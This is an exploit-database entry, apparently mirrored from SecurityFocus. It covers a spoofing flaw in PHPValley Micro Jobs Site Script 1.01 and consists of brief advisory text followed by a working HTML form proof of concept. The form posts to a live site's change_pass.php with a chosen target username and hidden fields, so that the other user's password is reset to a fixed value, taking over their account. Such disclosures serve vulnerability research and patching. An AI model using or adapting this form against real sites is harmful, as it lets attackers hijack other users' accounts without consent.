PHPValley Micro Jobs Site Script - Spoofing

Author: Jason Whelan
type: webapps
platform: php
port: 
date_added: 2013-04-27 
date_updated: 2015-10-20 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/59536/info

PHPValley Micro Jobs Site Script is prone to a vulnerability that allows attackers to spoof another user.

Attackers can exploit this issue to spoof another user; other attacks are also possible.

PHPValley Micro Jobs Site Script 1.01 is vulnerable; other versions may also be affected.

<!-- be logged into your own account, edit info below: -->
<form method="post" action="http://webfiver.com/change_pass.php">
<input name="changepass" type="hidden" value="Update" />
Target Username: <input name="auser" type="text" />
Your Password:   <input name="cpass" type="password" />
 <input name="npass" type="hidden" value="jacked" />
 <input name="npassc" type="hidden" value="jacked" />
 <input type="submit" value="Jack" />
</form>